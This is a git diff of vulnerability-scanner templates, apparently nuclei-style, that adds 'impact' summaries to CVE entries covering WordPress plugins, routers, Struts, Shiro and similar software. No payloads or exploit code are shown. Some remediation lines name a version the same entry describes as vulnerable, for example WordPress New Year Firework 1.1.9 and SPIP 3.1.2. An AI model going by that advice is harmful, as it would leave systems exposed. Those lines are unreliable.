a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 3dde7297ce..e7d8e6fa7e 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Infusionsoft Gravity Forms plugin (>=1.5.12) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index dd66d576c2..0fb9490571 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: | Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index a402d0e709..d0e272fd13 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Upgrade to version 2.0 or higher. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 36eee6a756..019d0ba103 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Allows remote attackers to execute arbitrary script or HTML code in the context of the affected site, potentially leading to session hijacking, defacement, or data theft. remediation: | Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary. reference: diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 9be75074a0..c24a934bb8 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index fcc8cf7c31..5afc637255 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 166a3e4193..008a2b354a 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of WordPress S3 Video plugin (>=0.984) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index f7de15a6a0..04a4ce8de2 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Upgrade to the latest version of the WordPress Simpel Reserveren plugin (>=3.5.3) or apply a patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index d08de79f4e..b1f638ce42 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 558c2437af..60172af726 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Tidio Gallery plugin (1.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 8b484e42f2..43d2b0f520 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 29df698550..1eda1064b7 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website. remediation: | Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 9ac460f158..928354d852 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet. reference: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index d4d4761c4b..95a020de63 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems. remediation: | Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134). reference: diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 9b56e7bf00..458df44bb7 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: high description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 473f513275..3fe459b2a0 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 9669b0566a..9942744e27 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution. remediation: | Update to the latest version of the plugin to fix the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index cc540d57f6..85d786b5df 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -5,6 +5,8 @@ info: author: cckuailong,daffainfo severity: high description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 2f9c801804..d831d16b6f 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,0x240x23elu severity: high description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 23b3234f48..e03709e27e 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index ac9d4beafa..45cca208f3 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 65a5c49c55..e624503f44 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 93233c93dc..00df20bcbb 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index b447395a95..6395005405 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches and updates provided by SAP to mitigate the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 48a352841f..d4c3dd6173 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions). + impact: | + Remote code execution remediation: | Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1. reference: diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 9aaa203602..858b3addfe 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -5,6 +5,8 @@ info: author: fq_hsu severity: critical description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application. + impact: | + An attacker can write arbitrary files on the server, potentially leading to remote code execution. remediation: | Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index d37aacfb59..956ef7d9fb 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft. remediation: | Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 20f11e6cb2..6f9a26c50c 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter. + impact: | + Remote code execution remediation: | Upgrade to a patched version of Apache Shiro reference: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index baacf4214d..3932795e1f 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -5,6 +5,8 @@ info: author: melbadry9,nadino,xElkomy severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + impact: | + Successful exploitation of this vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and cache poisoning. remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index cd4ac35ff8..1cf46ca5e4 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system. remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. reference: - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index c690d1423a..b9ac0410e6 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -5,6 +5,8 @@ info: author: suman_kar severity: critical description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. + impact: | + An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 8f1834dda9..dc70d3f9f4 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index a826c76e35..8ff6be6804 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to unauthorized access, data theft, or network compromise. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 0b8c45c132..2d66191540 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. remediation: | Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 85a381cfe0..fa9d1fdc9c 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the appliance. remediation: | Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 5c7fa948d1..cdf13edcfd 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. + impact: | + An attacker can gain unauthorized access to the camera and potentially control its functions. remediation: | Upgrade to the latest version of the firmware provided by Sony. reference: diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 2111491153..14e720711a 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser. remediation: | Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 418bd7fa36..2791bb4d20 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 4b7ad2f80b..eef3c268db 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -5,6 +5,8 @@ info: author: charanrayudu,meme-lord severity: high description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above. reference: diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index ebcbd705c9..d5b896c7ca 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 477dfd6a64..8bed85367b 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. remediation: | Apply the latest security patches or upgrade to a patched version of the Phoenix Framework. reference: diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 9ad45c4d70..07d183224d 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree. + impact: | + Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution. remediation: | Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index a9d270e957..46c41f85df 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -5,6 +5,8 @@ info: author: Moritz Nentwig severity: critical description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application. reference: diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 078cf3897b..f8b0c67682 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches provided by Oracle to fix this vulnerability. reference: diff --git 